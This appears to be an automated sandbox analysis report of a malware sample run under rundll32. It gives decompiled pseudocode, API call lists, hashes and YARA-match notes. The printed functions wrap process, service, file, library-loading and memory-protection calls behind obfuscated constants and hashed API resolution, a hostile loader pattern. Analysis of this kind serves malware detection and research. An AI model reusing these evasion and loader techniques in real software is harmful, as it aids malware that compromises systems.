                                                                      • Opcode Fuzzy Hash: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
                                                                      • Instruction Fuzzy Hash: 13214671D00209BFEB18CFA9C9469DEBBB5FB45310F50C099E814AA2A0D7B99B109B51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0037C0C8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 531 37c0c8-37c191 call 372550 call 367378 CreateFileW
                                                                      C-Code - Quality: 53%
                                                                      			E0037C0C8(long __ecx, long __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16, long _a20, intOrPtr _a24, long _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t40;
				void* _t48;
				long _t52;
				long _t53;

				_t52 = __edx;
				_push(0);
				_push(_a36);
				_t53 = __ecx;
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00372550(_t40);
				_v20 = 0xb477;
				_v20 = _v20 >> 0x10;
				_v20 = _v20 ^ 0x000000e5;
				_v16 = 0xb312;
				_v16 = _v16 + 0x2a6f;
				_v16 = _v16 ^ 0x0000d90b;
				_v12 = 0x5a0b;
				_v12 = _v12 + 0x400b;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x09a119a3;
				_v8 = 0x3388;
				_v8 = _v8 + 0x85f8;
				_v8 = _v8 * 0x5a;
				_v8 = _v8 ^ 0x00415e39;
				E00367378(__ecx, 0x81a8678d, __ecx, 0x90f109b3, 0x2bf);
				_t48 = CreateFileW(_a8, _t52, _t53, 0, _a32, _a20, 0); // executed
				return _t48;
			}











                                                                      0x0037c0d3
                                                                      0x0037c0d5
                                                                      0x0037c0d6
                                                                      0x0037c0d9
                                                                      0x0037c0db
                                                                      0x0037c0de
                                                                      0x0037c0df
                                                                      0x0037c0e2
                                                                      0x0037c0e5
                                                                      0x0037c0e8
                                                                      0x0037c0eb
                                                                      0x0037c0ee
                                                                      0x0037c0f1
                                                                      0x0037c0f2
                                                                      0x0037c0f3
                                                                      0x0037c0f8
                                                                      0x0037c102
                                                                      0x0037c106
                                                                      0x0037c10d
                                                                      0x0037c114
                                                                      0x0037c11b
                                                                      0x0037c122
                                                                      0x0037c129
                                                                      0x0037c130
                                                                      0x0037c134
                                                                      0x0037c13b
                                                                      0x0037c142
                                                                      0x0037c15d
                                                                      0x0037c160
                                                                      0x0037c174
                                                                      0x0037c189
                                                                      0x0037c191

                                                                      APIs
                                                                      • CreateFileW.KERNEL32(0000D90B,?,D583BA2A,00000000,?,0ACC4A3C,00000000), ref: 0037C189
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: 9^A
                                                                      • API String ID: 823142352-4044883665
                                                                      • Opcode ID: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
                                                                      • Instruction ID: 3ddbc7ab29c7f91cdabad37061dbc3fabc1dd7ba5f204c4cc84daee86c8cadd2
                                                                      • Opcode Fuzzy Hash: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
                                                                      • Instruction Fuzzy Hash: 9521EFB290020CBFEF019F95DD498DEBBB9EB45358F108198FA2466250D7B69E249B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003C1638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 536 3c1638-3c1641 537 3c164b-3c16d1 DdeInitializeA call 3c1328 call 3c1a14 536->537 538 3c1643 536->538 548 3c16d6-3c16eb 537->548 538->537
                                                                      APIs
                                                                      • DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 003C1686
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: Link
                                                                      • API String ID: 2538663250-2526951119
                                                                      • Opcode ID: 300092c084eb4d181be9f1bb182563589a76f74aca148936dc60044346acd701
                                                                      • Instruction ID: de63df5982318b0b0688ef1e5774df79959982ca5185062a24fe354e95512c33
                                                                      • Opcode Fuzzy Hash: 300092c084eb4d181be9f1bb182563589a76f74aca148936dc60044346acd701
                                                                      • Instruction Fuzzy Hash: A0118C74600740AFD722EB74CD82B4E77E8AF06740B919838F804DBB56EA76AE009755
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0049EB40, Relevance: 3.3, APIs: 2, Instructions: 252memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 550 49eb40-49eb93 VirtualProtect 551 49eb95-49eba1 550->551 552 49eba6-49ec17 550->552 553 49ec3a-49ec85 call 49e7a0 call 49e7e0 551->553 552->553 569 49ec19-49ec37 552->569 560 49ec90-49ec9a 553->560 562 49ecf8-49ed4a call 49e920 560->562 563 49ec9c-49eca3 560->563 572 49ed78-49ed7f 562->572 573 49ed4c-49ed50 562->573 565 49eced-49ecf6 563->565 566 49eca5-49ecac 563->566 565->560 566->565 571 49ecae-49ecea call 49e7e0 566->571 569->553 571->565 577 49ed8a-49ed94 572->577 573->572 576 49ed52-49ed75 call 49e880 573->576 576->572 580 49ede6-49ee1b call 49f000 577->580 581 49ed96-49ed9d 577->581 584 49eddb-49ede4 581->584 585 49ed9f-49eda6 581->585 584->577 585->584 588 49eda8-49edd9 call 49ee20 VirtualProtect 585->588 588->584
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0049EB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0049EDD9
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2107113862.0000000000480000.00000040.00000001.sdmp, Offset: 00480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_480000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: dadbc3be37d55ae011d11176274fd3627269d11785798018edc636a7e17013b5
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: 12C1B9B5A00209DFCB48CF89C590EAEB7B6BF88304F148159E919AB355D735EE42CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003C1A14, Relevance: 3.1, APIs: 2, Instructions: 56serviceCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 003C1AC8: DdeFreeStringHandle.USER32(?,?), ref: 003C1AE8
                                                                      • DdeCreateStringHandleA.USER32(?,00000000), ref: 003C1A82
                                                                      • DdeNameService.USER32(?,00000000,00000000,00000001), ref: 003C1A95
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106889647.0000000000383000.00000020.00020000.sdmp, Offset: 00383000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_383000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$CreateFreeNameService
                                                                      • String ID:
                                                                      • API String ID: 374373348-0
                                                                      • Opcode ID: 3f24b2819c163fdcf0d451e0feb5b34f865434fdcd21294656277ac4aae635b1
                                                                      • Instruction ID: 8a95dceeb941b887d1cc5923c37858816e78adb3c69bf121f04662eef27cb9c9
                                                                      • Opcode Fuzzy Hash: 3f24b2819c163fdcf0d451e0feb5b34f865434fdcd21294656277ac4aae635b1
                                                                      • Instruction Fuzzy Hash: 36115235B212549FDB17EBA4C892F4A37ACAF4AB00B514564FD00DF24BDA71ED009794
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00367F4B, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 47stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 80%
                                                                      			E00367F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t35;
				int _t43;
				WCHAR* _t46;

				_push(_a12);
				_t46 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00372550(_t35);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x71485a;
				_v28 = 0x57c810;
				_v20 = 0x2813;
				_v20 = _v20 * 0x59;
				_v20 = _v20 ^ 0x000dd428;
				_v16 = 0xdb84;
				_v16 = _v16 | 0xe2c96d38;
				_v16 = _v16 ^ 0xe2c994d7;
				_v12 = 0xc19e;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000060ae;
				_v8 = 0x265e;
				_v8 = _v8 + 0x315a;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x02bd94c0;
				E00367378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
				_t43 = lstrcmpiW(_t46, _a4); // executed
				return _t43;
			}













                                                                      0x00367f52
                                                                      0x00367f55
                                                                      0x00367f57
                                                                      0x00367f5a
                                                                      0x00367f5e
                                                                      0x00367f5f
                                                                      0x00367f64
                                                                      0x00367f6b
                                                                      0x00367f72
                                                                      0x00367f79
                                                                      0x00367f94
                                                                      0x00367f97
                                                                      0x00367f9e
                                                                      0x00367fa5
                                                                      0x00367fac
                                                                      0x00367fb3
                                                                      0x00367fba
                                                                      0x00367fbe
                                                                      0x00367fc5
                                                                      0x00367fcc
                                                                      0x00367fd3
                                                                      0x00367fd7
                                                                      0x00367feb
                                                                      0x00367ff7
                                                                      0x00367ffd

                                                                      APIs
                                                                      • lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 00367FF7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: ZHq
                                                                      • API String ID: 1586166983-2177431251
                                                                      • Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction ID: c60deab9ba6b936709c0d8a632fbcf04c802e8dcff9eeef48af14848a776191a
                                                                      • Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction Fuzzy Hash: A311DFB6C01219ABDF11DFA4C94A8DEBFB4EF04318F108588E92466251D3B95B15DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0049E620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0049E6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2107113862.0000000000480000.00000040.00000001.sdmp, Offset: 00480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_480000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: 3b76c5742da86df5fe75b5bfdd76e8ca751b2cf8203c4e97b7c5f32c0e539b75
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: EF113060D08289EAEF01D7E99409BFFBFB55B11708F044098D5446B282D2BE57588BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0037B86E, Relevance: 1.6, APIs: 1, Instructions: 74processCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 40%
                                                                      			E0037B86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t49;
				int _t58;
				signed int _t60;
				int _t65;

				_push(_a68);
				_t65 = __ecx;
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00372550(_t49);
				_v12 = 0xd1fa;
				_t60 = 0x3c;
				_v12 = _v12 / _t60;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x00001682;
				_v20 = 0xd4c2;
				_v20 = _v20 + 0x3986;
				_v20 = _v20 ^ 0x00013905;
				_v8 = 0x8c53;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0x000060d6;
				_v16 = 0x467b;
				_v16 = _v16 + 0xffff2b71;
				_v16 = _v16 ^ 0xffff105c;
				E00367378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
				return _t58;
			}











                                                                      0x0037b876
                                                                      0x0037b87b
                                                                      0x0037b87d
                                                                      0x0037b87e
                                                                      0x0037b881
                                                                      0x0037b884
                                                                      0x0037b887
                                                                      0x0037b88a
                                                                      0x0037b88d
                                                                      0x0037b890
                                                                      0x0037b891
                                                                      0x0037b892
                                                                      0x0037b893
                                                                      0x0037b896
                                                                      0x0037b897
                                                                      0x0037b89a
                                                                      0x0037b89d
                                                                      0x0037b8a0
                                                                      0x0037b8a4
                                                                      0x0037b8a5
                                                                      0x0037b8aa
                                                                      0x0037b8bb
                                                                      0x0037b8c3
                                                                      0x0037b8c6
                                                                      0x0037b8ca
                                                                      0x0037b8d1
                                                                      0x0037b8d8
                                                                      0x0037b8df
                                                                      0x0037b8e6
                                                                      0x0037b8ed
                                                                      0x0037b8f1
                                                                      0x0037b8f4
                                                                      0x0037b8fb
                                                                      0x0037b902
                                                                      0x0037b909
                                                                      0x0037b928
                                                                      0x0037b942
                                                                      0x0037b949

                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 0037B942
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction ID: 78a995dbe56533c8809a1bfef6e7f75c8e405879f3fbaa74f30c911653d5413b
                                                                      • Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction Fuzzy Hash: 7221C472800248BBDF169F95CD09CDFBFB9FF89714F408158FA1466260D7B69A60DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0036471A, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 58%
                                                                      			E0036471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t50;
				intOrPtr* _t61;
				void* _t62;
				signed int _t63;
				signed int _t64;

				E00372550(_t50);
				_v20 = 0xf336;
				_v20 = _v20 + 0x29f7;
				_v20 = _v20 ^ 0x000152a0;
				_v8 = 0xc9c4;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 << 3;
				_t63 = 0x6d;
				_v8 = _v8 * 0x43;
				_v8 = _v8 ^ 0x0000467c;
				_v16 = 0x763b;
				_t64 = 0x2d;
				_v16 = _v16 / _t63;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x000058e5;
				_v12 = 0x527e;
				_v12 = _v12 / _t64;
				_v12 = _v12 | 0xd776a7a3;
				_v12 = _v12 ^ 0xd776f938;
				_t61 = E00367378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
				return _t62;
			}












                                                                      0x0036473b
                                                                      0x00364740
                                                                      0x0036474a
                                                                      0x00364753
                                                                      0x0036475a
                                                                      0x00364761
                                                                      0x00364765
                                                                      0x0036476f
                                                                      0x00364772
                                                                      0x00364775
                                                                      0x0036477c
                                                                      0x00364788
                                                                      0x00364789
                                                                      0x0036478e
                                                                      0x00364792
                                                                      0x00364799
                                                                      0x003647aa
                                                                      0x003647ad
                                                                      0x003647b4
                                                                      0x003647d3
                                                                      0x003647e4
                                                                      0x003647ea

                                                                      APIs
                                                                      • SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 003647E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FolderPath
                                                                      • String ID:
                                                                      • API String ID: 1514166925-0
                                                                      • Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction ID: d2848275828aecea075f618de822f80a2cecc93ca98c4ed74b6e2e9e8efae337
                                                                      • Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction Fuzzy Hash: 12210372D01208FBEF15DFE5C84A8DEBBB5EF05354F108089E924AA250D3B59B10DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0037340E, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 86%
                                                                      			E0037340E(void* __ecx, void* __edx, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				void* _t45;
				void* _t57;
				signed int _t59;
				signed int _t60;

				_push(_a12);
				_push(0);
				_push(0);
				E00372550(_t45);
				_v28 = 0x755cc3;
				_v24 = 0;
				_v20 = 0xc93f;
				_v20 = _v20 >> 3;
				_t59 = 0x1a;
				_v20 = _v20 / _t59;
				_v20 = _v20 ^ 0x00003660;
				_v16 = 0x16ad;
				_v16 = _v16 + 0x57a7;
				_v16 = _v16 | 0xbe0b763b;
				_v16 = _v16 ^ 0xbe0b2e9f;
				_v12 = 0xa207;
				_v12 = _v12 + 0xb6;
				_t60 = 0x37;
				_v12 = _v12 * 0x38;
				_v12 = _v12 ^ 0x0023dbd3;
				_v8 = 0xebb1;
				_v8 = _v8 / _t60;
				_v8 = _v8 | 0x19ad118e;
				_v8 = _v8 ^ 0x19ad0924;
				E00367378(_t60, 0x3e7f6fd6, _t60, 0x2daf77dd, 0x231);
				_t57 = OpenSCManagerW(0, 0, _a12); // executed
				return _t57;
			}













                                                                      0x00373415
                                                                      0x0037341a
                                                                      0x0037341b
                                                                      0x0037341e
                                                                      0x00373423
                                                                      0x0037342d
                                                                      0x00373432
                                                                      0x00373439
                                                                      0x00373442
                                                                      0x00373447
                                                                      0x0037344c
                                                                      0x00373453
                                                                      0x0037345a
                                                                      0x00373461
                                                                      0x00373468
                                                                      0x0037346f
                                                                      0x00373476
                                                                      0x00373481
                                                                      0x0037348d
                                                                      0x00373490
                                                                      0x00373497
                                                                      0x003734a8
                                                                      0x003734ab
                                                                      0x003734b2
                                                                      0x003734c6
                                                                      0x003734d3
                                                                      0x003734d9

                                                                      APIs
                                                                      • OpenSCManagerW.SECHOST(00000000,00000000,00003660,?,?,?,?,?,?,?,?,?,B0D9BF73), ref: 003734D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ManagerOpen
                                                                      • String ID:
                                                                      • API String ID: 1889721586-0
                                                                      • Opcode ID: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
                                                                      • Instruction ID: 322d6a02dbca8214b853831efc1d62d28e11b160857af95149bfccbca261bc95
                                                                      • Opcode Fuzzy Hash: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
                                                                      • Instruction Fuzzy Hash: 8C21E3B1D0131DABDB18DFA9C84A8EFBBB5FB15714F10819AE414AA240D3B55B148F91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00370321, Relevance: 1.6, APIs: 1, Instructions: 59serviceCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 79%
                                                                      			E00370321(void* __ecx, int __edx, intOrPtr _a4, intOrPtr _a8, short* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				void* _t56;
				void* _t59;
				int _t60;

				_push(_a12);
				_t60 = __edx;
				_t59 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00372550(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xc39a9;
				_v20 = 0xd5ea;
				_v20 = _v20 | 0xff6e49b2;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0xfeddf181;
				_v12 = 0x5ebb;
				_v12 = _v12 * 0x36;
				_v12 = _v12 * 0x4e;
				_v12 = _v12 | 0x0415626f;
				_v12 = _v12 ^ 0x0617d8e0;
				_v16 = 0xb467;
				_v16 = _v16 << 4;
				_v16 = _v16 * 0x58;
				_v16 = _v16 ^ 0x03e03a17;
				_v8 = 0xc80e;
				_v8 = _v8 * 5;
				_v8 = _v8 * 0x5d;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x000b2851;
				E00367378(__ecx, 0x612723fe, __ecx, 0x2daf77dd, 0x10e);
				_t56 = OpenServiceW(_t59, _a12, _t60); // executed
				return _t56;
			}













                                                                      0x00370329
                                                                      0x0037032c
                                                                      0x0037032e
                                                                      0x00370330
                                                                      0x00370333
                                                                      0x00370336
                                                                      0x00370337
                                                                      0x00370338
                                                                      0x0037033d
                                                                      0x00370344
                                                                      0x0037034b
                                                                      0x00370352
                                                                      0x00370359
                                                                      0x0037035c
                                                                      0x00370363
                                                                      0x0037037e
                                                                      0x00370386
                                                                      0x00370389
                                                                      0x00370390
                                                                      0x00370397
                                                                      0x0037039e
                                                                      0x003703a6
                                                                      0x003703a9
                                                                      0x003703b0
                                                                      0x003703bb
                                                                      0x003703c2
                                                                      0x003703c5
                                                                      0x003703c9
                                                                      0x003703dc
                                                                      0x003703e9
                                                                      0x003703f0

                                                                      APIs
                                                                      • OpenServiceW.SECHOST(?,FEDDF181,B0D9BF73,?,?,?,?,?,?,?,?,00000000,B0D9BF73), ref: 003703E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: OpenService
                                                                      • String ID:
                                                                      • API String ID: 3098006287-0
                                                                      • Opcode ID: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
                                                                      • Instruction ID: 86abe385576182b3b15961d23b330b3de7c66657602c2e8231cf77faffa024f3
                                                                      • Opcode Fuzzy Hash: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
                                                                      • Instruction Fuzzy Hash: 4721FFB1C01209BBCB15DFA5C98A8DEBFB4EB45304F108099E824B6251D3B49B44DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003749CF, Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 95%
                                                                      			E003749CF(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t52;
				struct HINSTANCE__* _t65;
				signed int _t67;
				signed int _t68;
				signed int _t69;

				_push(_a4);
				E00372550(_t52);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x2e62bd;
				_v12 = 0x9175;
				_v12 = _v12 >> 3;
				_v12 = _v12 >> 4;
				_t67 = 0x72;
				_v12 = _v12 / _t67;
				_v12 = _v12 ^ 0x00007d95;
				_v20 = 0x6b8f;
				_v20 = _v20 + 0xab5d;
				_v20 = _v20 ^ 0x000118a2;
				_v16 = 0x74fd;
				_v16 = _v16 + 0xb2f4;
				_v16 = _v16 | 0x45835894;
				_v16 = _v16 ^ 0x45831718;
				_v8 = 0x475a;
				_t68 = 0x1a;
				_v8 = _v8 / _t68;
				_t69 = 0x71;
				_v8 = _v8 / _t69;
				_v8 = _v8 | 0x9a1a6af5;
				_v8 = _v8 ^ 0x9a1a601d;
				E00367378(_t69, 0xd3779e90, _t69, 0x90f109b3, 0xd8);
				_t65 = LoadLibraryW(_a4); // executed
				return _t65;
			}














                                                                      0x003749d5
                                                                      0x003749da
                                                                      0x003749df
                                                                      0x003749e6
                                                                      0x003749ef
                                                                      0x003749f6
                                                                      0x003749fa
                                                                      0x00374a03
                                                                      0x00374a08
                                                                      0x00374a0d
                                                                      0x00374a14
                                                                      0x00374a1b
                                                                      0x00374a22
                                                                      0x00374a29
                                                                      0x00374a30
                                                                      0x00374a37
                                                                      0x00374a3e
                                                                      0x00374a45
                                                                      0x00374a4f
                                                                      0x00374a54
                                                                      0x00374a5c
                                                                      0x00374a64
                                                                      0x00374a67
                                                                      0x00374a6e
                                                                      0x00374a8d
                                                                      0x00374a98
                                                                      0x00374a9d

                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(00007D95), ref: 00374A98
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Offset: 00360000, based on PE: true
                                                                      • Associated: 00000010.00000002.2106874436.0000000000380000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000010.00000002.2106883889.0000000000382000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_360000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
